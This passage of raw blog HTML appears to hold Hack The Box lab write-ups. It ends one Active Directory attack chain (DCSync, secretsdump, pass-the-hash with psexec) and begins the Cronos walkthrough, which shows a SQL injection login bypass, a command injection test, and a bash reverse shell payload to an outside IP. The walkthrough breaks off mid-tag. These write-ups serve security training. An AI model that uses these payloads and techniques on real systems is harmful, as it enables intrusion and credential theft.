srcset="/static/2557db04fa8bfb413e067a7ecaac7f39/dda05/create-user-add-to-group.png 158w, /static/2557db04fa8bfb413e067a7ecaac7f39/679a3/create-user-add-to-group.png 315w, /static/2557db04fa8bfb413e067a7ecaac7f39/50637/create-user-add-to-group.png 630w, /static/2557db04fa8bfb413e067a7ecaac7f39/adb42/create-user-add-to-group.png 741w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Granted <code class="language-text">user1</code> DCSync permission:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f6e673c9b05e95ec1a17dc3305221294/b217e/dcsync-permission.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 15.18987341772152%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAqElEQVR42iWOSRaDMAxDOUzbDVCGQEwChDBPLb3/aVQnLPTsPEXfCoSw0DShkT3qdoFqDwg1oag3VN0J2e4oG97NgXc5gHhKfgu9oO4v9jcoe8JMP58LyMHY1DQwcEWuZmTVyMCVP8z3ZN8dcLsDugNZNd2iEYkcWD3i3CAQaQuZGqhEg6hDoXffRtsPpNlRDxc3+XpIyAEXdk3jwuIVKTzCikVez4jwB1QqZTLT+zJFAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="DCSync permission" title="" src="/static/f6e673c9b05e95ec1a17dc3305221294/50637/dcsync-permission.png" srcset="/static/f6e673c9b05e95ec1a17dc3305221294/dda05/dcsync-permission.png 158w, /static/f6e673c9b05e95ec1a17dc3305221294/679a3/dcsync-permission.png 315w, /static/f6e673c9b05e95ec1a17dc3305221294/50637/dcsync-permission.png 630w, /static/f6e673c9b05e95ec1a17dc3305221294/b217e/dcsync-permission.png 743w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Used <code class="language-text">secretsdump.py</code> to dump NTLM hashes:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1dc3fcda02d6ad235f0811f49d8a4245/6ce55/secretsdump.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.93670886075949%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAByElEQVR42jVS6ZrbIBDzs6TbNKeJr9jY+ML4zrXJbtv3fxFVeLs/9EnMwKAZcDZhg1/xA2v5xCZqUbYPNNMnzPwH9fDCKWmx90usjxI/DwlB3id4I1a7GKvtecEPagvnlPbw1AyRWYyIyxmyviIzD6jmjqiYGJuwC0qIpOEFBseoXnjrFVgLtWBlLyCcMG6gmxu0vqKqL1AskLOAVAPK6kI9I6MuyGnWQaYdXJHhcIjJKYSXL1hvIrwRzsSCXdqiz3qMPDiQB7rueNDqKR/RW81cHVUoPAXlSuQs9sUJ5D5EbuMnBWegM01XdT7BsNVW39CSe7bbLfrGHItSd+xgMHfGLujNDUPDrjIDsQtw3ATY2xnm5olm/A09fPIRPlB1T7TzX+j+A0rf/8de5E8U7Tuq/oWSRXNeqHhZ2T6R6QdCdrkVEo6ks9q8c2YjXL6mH3HwocbRr3Dg0EVYfyGoIJgXvmXNvdwTaJzOBqdIM6Z4hi2r6gpDN3l1g89knI4IZY8w6eCdG+oOEdcR12Fstc0P8PmdPK5D7vfPNQJJI7GBkxYzGrZknbpBDS8y8OhQWJdetbi18BbnFpwZ2SW+Hbp0Jvhgh6DCP9SnMoLdFI4CAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="secretsdump.py" title="" src="/static/1dc3fcda02d6ad235f0811f49d8a4245/50637/secretsdump.png" srcset="/static/1dc3fcda02d6ad235f0811f49d8a4245/dda05/secretsdump.png 158w, /static/1dc3fcda02d6ad235f0811f49d8a4245/679a3/secretsdump.png 315w, /static/1dc3fcda02d6ad235f0811f49d8a4245/50637/secretsdump.png 630w, /static/1dc3fcda02d6ad235f0811f49d8a4245/6ce55/secretsdump.png 745w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I ran <code class="language-text">psexec.py</code> to pass the hash of the <code class="language-text">Administrator</code> user to obtain a shell as <code class="language-text">nt authority\system</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/da95116c6cd90f798d852ac57a4a6bd9/7f1ed/root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 73.41772151898735%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACbUlEQVR42nVT2XLaQBDUrwRhEBII3drVgQ4OCeMD20mqUpX//41Oz0Ji4sQPU6Nddnv7GKxFdoBTfsdMf8OyOKEdXjA8/sDx/BPj0w904xvcpMU82sCLGoT5Dn7aI1R7BPmW3x1W/F36bKVhxcURUTFirQ6IiwPy6oiUpZoTMvZ8c49A75HUR/hJZ9Z5fW96Wo1IWF7cwA03uFsSMCsGlO0DNA8oHlTsAlxtn3lxxNRTmLo5Jk6KyTy5Vowvs+hScymuHe7znKX4crd/RT+8odmd+f2C7vCK7fCVj5zgBTVmnsZ0kbMUbHZ7kcHmAzZBbIJNCDqZhaYsRcobstlsz6j7Z1TdkwEUr2L6lJWURDkCMjGX38u+LbKd3AWwRKqANVK7F5TNg/muCSx+tmQdMoSZq7BYlYbthWV+Yfkb7FpWmO0Mi1QPpkdkpiQYhrRmCIEkmm6xChsE2RbuuuLFW4YiXR4QOxhKRMCKoeTlAM1QEsr0oxauX9F0CSA1JWzMenYBmToEcLQBuYBdyvI5WylBwqRHTHbruIO7qrAMGjLsDUPZ81lhujP7UzK6AKq/wGwn4xwSRDNpkSksU0XpnE1hKzYsgw3905h7BZxlwa4N2L+A2oyUlZdHI1kABaRuHyn7YMIpODbOsqRMMT/7U/8HvDL0ORJrerYiE29dI0g6E4L0IJHeI8r2DKW9Ss0/BxQPhZWwkX9Mqg9GsufXZk/G5I6HRLL0d8AbDz+AWiKr4UAnxssTNv0ZwlrCkosCluqRD458oLpK/sDyBtSaygjIWNCnOS9reiqJy9yF1xkUn1V1z0c6E86noI7CL2+r487T0AynAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root" title="" src="/static/da95116c6cd90f798d852ac57a4a6bd9/50637/root.png" srcset="/static/da95116c6cd90f798d852ac57a4a6bd9/dda05/root.png 158w, /static/da95116c6cd90f798d852ac57a4a6bd9/679a3/root.png 315w, /static/da95116c6cd90f798d852ac57a4a6bd9/50637/root.png 630w, /static/da95116c6cd90f798d852ac57a4a6bd9/7f1ed/root.png 673w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-cronos/https://mgarrity.com/hack-the-box-cronos/Fri, 25 Aug 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/daa512b0036f47b7e38360d160e12370/3b67f/cronos.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABDklEQVR42mMQkdX+jwuLymn/F5LR/s8jofNfSBrCx6cehBnwGcYjof1fRkHzv6mu2n9pIM0rSdhQBlyG8QE1Wxpp/y9KdPxfWB73vyLJ9r+pAVBcCr+hWA0EeVNaUet/ZazZf//0ov++jUv/+6Xm/a9NtPovIa/5X5gUF4Js55XU+W+kp/G/JM/vv13RhP+1C1b+N06t/1+a5/PfUFcD6EodnK7E7kJZnf8ycmr/8zJ8/mvOvvhfuOvof+WKGf8LUl3/S8uqg+VJ8rIYKEKAYWimp/4/P9Pvf2Zd9v+cRGcgn3DE4I1lXmAESMuq/jfRUvkvBXQZKKJEyU02MJcKy+r+55PW/S8spwPmE0qHACNkB3Mwaq3GAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Cronos" title="" src="/static/daa512b0036f47b7e38360d160e12370/50637/cronos.png" srcset="/static/daa512b0036f47b7e38360d160e12370/dda05/cronos.png 158w, /static/daa512b0036f47b7e38360d160e12370/679a3/cronos.png 315w, /static/daa512b0036f47b7e38360d160e12370/50637/cronos.png 630w, /static/daa512b0036f47b7e38360d160e12370/fddb0/cronos.png 945w, /static/daa512b0036f47b7e38360d160e12370/3b67f/cronos.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Cronos is a Linux machine hosting a website with an admin subdomain that contains a login form with a SQL injection vulnerability. After bypassing the login, a page is brought up that provides the ability to execute <code class="language-text">ping</code> or <code class="language-text">traceroute</code> and view the output. The form for this functionality is susceptible to command injection and can be leveraged to obtain a shell on the box. Enumeration of the system leads to the discovery of a cron job that runs a PHP script as <code class="language-text">root</code>; the current user (<code class="language-text">www-data</code>) owns this file and thus has full permissions, therefore the automated task can be exploited by adding custom code to the script that when executed, establishes a reverse shell as <code class="language-text">root</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3bfa203ddca2f7387c5e1d942335c4c4/14945/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 51.89873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABy0lEQVR42l1S2XajMBTjU5o2aSEQNhuzmCVAQghN2jz0zPz/l2hkZ9pO50HnejlXvpLsuNkR2/oDXnWDm43Qhxumy2+Myy8M8wekPmEn93Cj+i+0xdM2/4Z/x5pwyv0VebtAD1eo+gRZTaj6C8/O9lzWMzJDKvbw0xbbpLEwRI+eYlU/SJ1meEfZnFH3VzTDHf10g1AD/Fgjynok+YhNUNrGtV/YavbPu8rWTVB8kTpKn9FRZju8IVE9dpyibGaEokWYNoiSCrFsEZM04JT32sFPWmuFWRsrPuU7XqiRU1LVvaKkxKq7oKB0pScSnyy5qRUVFLyrRyrqli/Jj/96aQhFMdkJtWkgkSEva2PBG0mNfwuyckKatRDFQAWcmhN/WvA/nKya0bI5N80kj8TIYM4MaEGsDngOKvhRyVBarDnRwybBwzrCahPhyYZS/CTM6WHZLCiaV+juClnODOHIMA4I5YiUvkbS+NTYEO5Sc6xeUhKHWLmSyCyMBY5gs4HipKk6WsKMjwjuhVkXIx8YkFK24Jfy4sYG4sX8QnHNNZF2NrCAgVrCSA5MtLdyE370neDenLFGokcQU7LkvTLER0tqpv3+7LU9c0ONP5/HRprKwAOJAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/3bfa203ddca2f7387c5e1d942335c4c4/50637/nmap-scan.png" srcset="/static/3bfa203ddca2f7387c5e1d942335c4c4/dda05/nmap-scan.png 158w, /static/3bfa203ddca2f7387c5e1d942335c4c4/679a3/nmap-scan.png 315w, /static/3bfa203ddca2f7387c5e1d942335c4c4/50637/nmap-scan.png 630w, /static/3bfa203ddca2f7387c5e1d942335c4c4/14945/nmap-scan.png 742w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Open ports:</p> <ul> <li>22 (SSH)</li> <li>53 (DNS)</li> <li>80 (HTTP)</li> </ul> <p>I added <code class="language-text">cronos.htb</code> to <code class="language-text">/etc/hosts</code> and visited the page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c4c7da2b284d41d4fa3c14a2393a9397/a8e07/visit-webpage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 45.56962025316456%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAmElEQVR42r2RUQ7EIAhEvf9pq21RAaUMbZP92qTZTU0IAwZ8YLI/n/RKwzGG1VqNmU1EwvqHnnM+a6iqRlRt23Yr62q5FFtydr/a4nr3u8cjgwSkMDwAKnjk4b82xGig2YmMfFQUj6GhqbaIRdipKYpab7GSU/fQ9xrSPWL3C/YivnYEsjMnFx1ivujVIeTUqgH07i//0vAAS2PJpx7JRhkAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visit webpage" title="" src="/static/c4c7da2b284d41d4fa3c14a2393a9397/50637/visit-webpage.png" srcset="/static/c4c7da2b284d41d4fa3c14a2393a9397/dda05/visit-webpage.png 158w, /static/c4c7da2b284d41d4fa3c14a2393a9397/679a3/visit-webpage.png 315w, /static/c4c7da2b284d41d4fa3c14a2393a9397/50637/visit-webpage.png 630w, /static/c4c7da2b284d41d4fa3c14a2393a9397/a8e07/visit-webpage.png 695w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The page above didn't give much to go off of yet, so I enumerated for subdomains with <code class="language-text">ffuf</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f2ea92bc8798be59faefe395ed3dfa53/c251d/ffuf-subdomains.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 59.49367088607595%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACGUlEQVR42lVT13LjMBDTn5xlq/febDXLNclMrjzc/38JDktpLs4DZpccEcQSkOY3DwT9X/jtJ5Lmgvn2E+f7b1wef9CNb0irCUU9oeyuyI8P1MMTJWs7vqMh2ukDxfHG/TdE5RlaWl/R9G9IuLCDDqZX4+AU2Fs5DLeC5bdwwiNsv2ZfwQ5booMbn+BssKMj3OQEi/uabhUkaRBlIzEgTEe4IT8iwvwMLxmhWyV0I4ZuJuxT1e9kbWfY81KB7qxVM9yat3dIeDhKZ2TVDUl1RVwuiIozSRcSpfy4xIFqD7z8sE2hmzFr/rVHaIZTw3QbJDwcUI0TcIywV8pEpUOIsvXA10HVizqqlPqf0AmO8OOBb7golUJo+UdYwQu8EgbxnfDlgldCIWv7dzX2zsiVury+I8xk3FnBTwaYHM1wMr53qcwxPYJGmUFLdMoQ6TVR1vYfamQv6hWq7knSG/Lmzog8IUmIqD6kaXE+sF9rELc0UszjulrgpQMV8vbT/ImeiLNZjV+1D0amxQ+jwM4ssWMSdjadFFhbdaQWq2EW3XbKdWRRNC6/kBaLGlkiU7Z3GjQp+ISoC9JZ9WKcz2gF2YSQ2bU4pm7TaXcjDKlKyGJ5L34YphNSPkPG6Mh+Wl74t3DkbCUVQiFz416F2mSU9lT6YoqYcOWv9VBVFIrqgE/h8g/x2UsSZF8Uu9FJmST53XPsg7u5vDn9D1rye1Lz7bRfAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ffuf" title="" src="/static/f2ea92bc8798be59faefe395ed3dfa53/50637/ffuf-subdomains.png" srcset="/static/f2ea92bc8798be59faefe395ed3dfa53/dda05/ffuf-subdomains.png 158w, /static/f2ea92bc8798be59faefe395ed3dfa53/679a3/ffuf-subdomains.png 315w, /static/f2ea92bc8798be59faefe395ed3dfa53/50637/ffuf-subdomains.png 630w, /static/f2ea92bc8798be59faefe395ed3dfa53/c251d/ffuf-subdomains.png 751w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A subdomain was found at <code class="language-text">admin.cronos.htb</code>, I added it to <code class="language-text">/etc/hosts</code> and browsed there which brought up a login page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 401px; " > <a class="gatsby-resp-image-link" href="/static/f56886e4b651c9071f3b11dfe9dfa85e/766a7/admin-cronos-htb-login.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 61.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABTElEQVR42p1STWvCQBD1H3oOgfwDS/1Jnow5W3OvUBErFC/GNoEWeogepGgSzefrvo0TCsUaOvCym9mZt292plMUBWjj8QN6vTv07/swDAOmad6EZVnodrsYDoeaoyxLdPihrVYrTCYuXNfFaGTDcRzYtq2Dr4Hng8EA8/lcc1RVhQ4uliQJijzXtwjaGnMlviGMlTOJYyyXz5jNnvA4neL1zcfpdEIURYjVGcH9+XzWBPlFAH2/CHlLluUqOKV4LT/LMu0nqYCkJJQSrypkcJqmCIJAw/d9bLc7lVQrYfMEQvRnyTVhho3nYb324Kk1VIS1qkQnEVLyTYV01kpKMKxiY5Qa+n6Cz8C1NeFm42OxeMH7x2ed9N8u67FRivb7L4ThDodD1Hps2KiGUGQfj0dFclAlpchVWXwnGZVbYJ7wNArpIGSo5b8txL4BAYuB/bEhcKYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="admin login page" title="" src="/static/f56886e4b651c9071f3b11dfe9dfa85e/766a7/admin-cronos-htb-login.png" srcset="/static/f56886e4b651c9071f3b11dfe9dfa85e/dda05/admin-cronos-htb-login.png 158w, /static/f56886e4b651c9071f3b11dfe9dfa85e/679a3/admin-cronos-htb-login.png 315w, /static/f56886e4b651c9071f3b11dfe9dfa85e/766a7/admin-cronos-htb-login.png 401w" sizes="(max-width: 401px) 100vw, 401px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A basic SQL injection of <code class="language-text">' or 1=1 -- -</code> bypassed the login:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 402px; " > <a class="gatsby-resp-image-link" href="/static/2c5725c2a197022fc8a1756e69e9037d/115f4/basic-sqli.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 60.12658227848101%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABNklEQVR42qWSzW6CUBCFeWJ3GHZsLPgO1kdgwQOwqTsbRN1omxjbkpAASRfyf/k5ZW561VJpSTvJCWTu3O/OmYxU1zUolstHTCZ3mE51yLKM8Xj8qxRFwWg0gmEYnNE0DSQBtG0b8/kc97MZNE2Drutc9N8nOldVFaZpXoD4jDRNUVU1/hJJkkA0JhFVJBkr4DgrLBYPsCwL+6dnFEWBLEtbZVz0MOWqquIiUBzHF+B1h2VZwvd9uK6LIAh5rqsoijhYWPzW4Vcga0EBwjBswQFOp9P5Yle9ls/A9lXGGPa7HbabDZz1Gp7ncVtkkc5IeZ7z78AOSy4qpAICdS3TvAg6CEjJw+EFK3uL4/ENVH/L7iDLIhn4YQt7bef4/v+1IYsiKC9W4yf1rg3NjqBCt1bmlrqNfADOEoAdDrD3WwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="basic SQLi" title="" src="/static/2c5725c2a197022fc8a1756e69e9037d/115f4/basic-sqli.png" srcset="/static/2c5725c2a197022fc8a1756e69e9037d/dda05/basic-sqli.png 158w, /static/2c5725c2a197022fc8a1756e69e9037d/679a3/basic-sqli.png 315w, /static/2c5725c2a197022fc8a1756e69e9037d/115f4/basic-sqli.png 402w" sizes="(max-width: 402px) 100vw, 402px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The admin page contained "Net Tool v0.1" which could be used to run either <code class="language-text">traceroute</code> or <code class="language-text">ping</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 370px; " > <a class="gatsby-resp-image-link" href="/static/d802f4ced45494f235f2a5b875e3772c/c9d3d/admin-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.0379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABNklEQVR42q2SW0/CQBCF+/9/gAT1AR+KBB/UHyCJAR8sEqA0qdyh23IJUCAmWtpuP9t6iRHCE5uczOzJnjM7k1E48VEeSiUG/T5atcp8PuP+7pZOt0ev16VSqbBcudReNB7LTzhijPnaSYVRFB02vLw4R1XVGNes1y6FvEo2m+Usk6FYvMFotbjK5cgXitRrVZ61WiqUUh42/E/8rZzkUkZxlKlBGIYpEu6L3/+lMhraCMthOBRMZ0uWi1Xc+hxhO2y3b/h+gOft8HZ+nPvpPUEQhLjumtFIYNtTLOHEXICi6zqGYdBsNukPLGwxwRqPabc7rOL5JcLdr5mf5gnCUMaFFzTqLRoNA10300LKZgPvH5BEz9ufSdLWMey1XC77mGaApvk4E/k98J/H0dEVOWSunHoPPwFaxK8gDRY9DwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="admin page" title="" src="/static/d802f4ced45494f235f2a5b875e3772c/c9d3d/admin-page.png" srcset="/static/d802f4ced45494f235f2a5b875e3772c/dda05/admin-page.png 158w, /static/d802f4ced45494f235f2a5b875e3772c/679a3/admin-page.png 315w, /static/d802f4ced45494f235f2a5b875e3772c/c9d3d/admin-page.png 370w" sizes="(max-width: 370px) 100vw, 370px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I tested for command injection with <code class="language-text">;id</code> after the IP address:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 378px; " > <a class="gatsby-resp-image-link" href="/static/7193ced7c4729a9a50e4627542e74d9b/6c874/test-command-injection.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 39.87341772151899%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABOUlEQVR42p1QTU/CQBTs/z/LUQ3RGE+aeFEv0BYrKhVBQApVaAnBcqC0xX5YujvuthCoEA++ZLLt29l580ZIkgSEUKwrjmMsl8v0m9JNn/P4/3ZvXwlVpYLTs3NcXV5ArTdQq9VwUjxCqSyheHwIra9DFEUUDgrQ+z1UFGU1jOwXtD4nkGUZYrmEgWHCsizc38koiRJub65hTadoNhuQJAmGMYTW6+24zwlur8HPbLUNYX2fgbB48uB9skIqaJpjPFRVPD7VoT6/QtM+mJMR3joddLsaDHOEKPqG7wcIwzBFFEVp1uPxhEX0ApWh3c6cC5zgunO4jgPPcxEG2SPPWzB4TMhHwpxw5zmQJOXZtoOZPcdi8ZUJDgeUTSHQ3ylaLcoE1qviXyUEAYU9I2wCgeNwJ7vZ/VW/eT9P9GEN3zE9ZwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="test command injection" title="" src="/static/7193ced7c4729a9a50e4627542e74d9b/6c874/test-command-injection.png" srcset="/static/7193ced7c4729a9a50e4627542e74d9b/dda05/test-command-injection.png 158w, /static/7193ced7c4729a9a50e4627542e74d9b/679a3/test-command-injection.png 315w, /static/7193ced7c4729a9a50e4627542e74d9b/6c874/test-command-injection.png 378w" sizes="(max-width: 378px) 100vw, 378px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The output confirmed successful command injection:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 519px; " > <a class="gatsby-resp-image-link" href="/static/bcde2d75280879fbadb6ecb7a235a0e5/572de/command-execution.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.708860759493675%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABFklEQVR42qVRy07DMBDM/38MCbciBGceRRW0QrkghSR2nDcpju0kTYa1y+OAgAMrjcZer2d3bK8oCtR1jbZ9QZ4LNG2LqqrQdR0yIbDfv0JrDRvLsjj8Ft7N9RX8wMfteo3Li3OcBKdYrc7wcL9B4PtY323AGPsU/Cu8w3SAMQOGYcRE63EcHeZ5dgKWP6C1QS+Vq/9RMI45drsQYfhEFkskSQIhchKdXJMjBtcsjhm220eaWLxf/z6x1zQFylKQCAPnDFmWOU7TlJiDETNizo45++ZJHFO9AM84NaF1niOKIjRNC68sFBUZgoJShuyQrb6HlNJNZj9Em6+8Usqd2bzNWR7GAbKXbu/RMIieF7KxkC38O94Ak3IX5bMYZhoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="command execution" title="" src="/static/bcde2d75280879fbadb6ecb7a235a0e5/572de/command-execution.png" srcset="/static/bcde2d75280879fbadb6ecb7a235a0e5/dda05/command-execution.png 158w, /static/bcde2d75280879fbadb6ecb7a235a0e5/679a3/command-execution.png 315w, /static/bcde2d75280879fbadb6ecb7a235a0e5/572de/command-execution.png 519w" sizes="(max-width: 519px) 100vw, 519px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I started a listener with <code class="language-text">nc</code> and sent the following payload to get a shell:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">8.8.8.8;bash -c 'bash -i >&amp; /dev/tcp/10.10.14.26/443 0>&amp;1'</code></pre></div> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 530px; " > <a class="gatsby-resp-image-link" href="/static/b2483dfb99d5c1676078066fe0726810/eb8fc/reverse-shell-payload.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.075949367088604%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABG0lEQVR42qVRSU7DQBD0/38CXMiNfIAIGZJrFClW8OzxEiWOt7HjosYHOCAQEi21urumt6mOtFI4HA4oyxLvtNpYWGuRZxlSIWb8drshyDRNs/4m0fotxuNige12i9f4BXf3D3herRDHMZ6WS2w2awzDgL9K1LYdrnWDqqrRNC26rqNtUBNr6VdVNWtd1zifLyiKE/q+/7mhFJrb7ZEkAs7lsM7BGgNnHWMHqTQMaSjKE6kR2O32HHD9pOBbw6JwOB7ZwGkorSDImyKvklZrAyklcY00TWGsIaYh6GsOlSJlvpzzkyRB7z0irTyLem7hMQ4jxnGA50P41jgyJn/BBh69H9D13dcbNRwsaKgJG0d5Bl51Ijfhgvi3fAAX1ReHBRGNggAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="reverse shell payload" title="" src="/static/b2483dfb99d5c1676078066fe0726810/eb8fc/reverse-shell-payload.png" srcset="/static/b2483dfb99d5c1676078066fe0726810/dda05/reverse-shell-payload.png 158w, /static/b2483dfb99d5c1676078066fe0726810/679a3/reverse-shell-payload.png 315w, 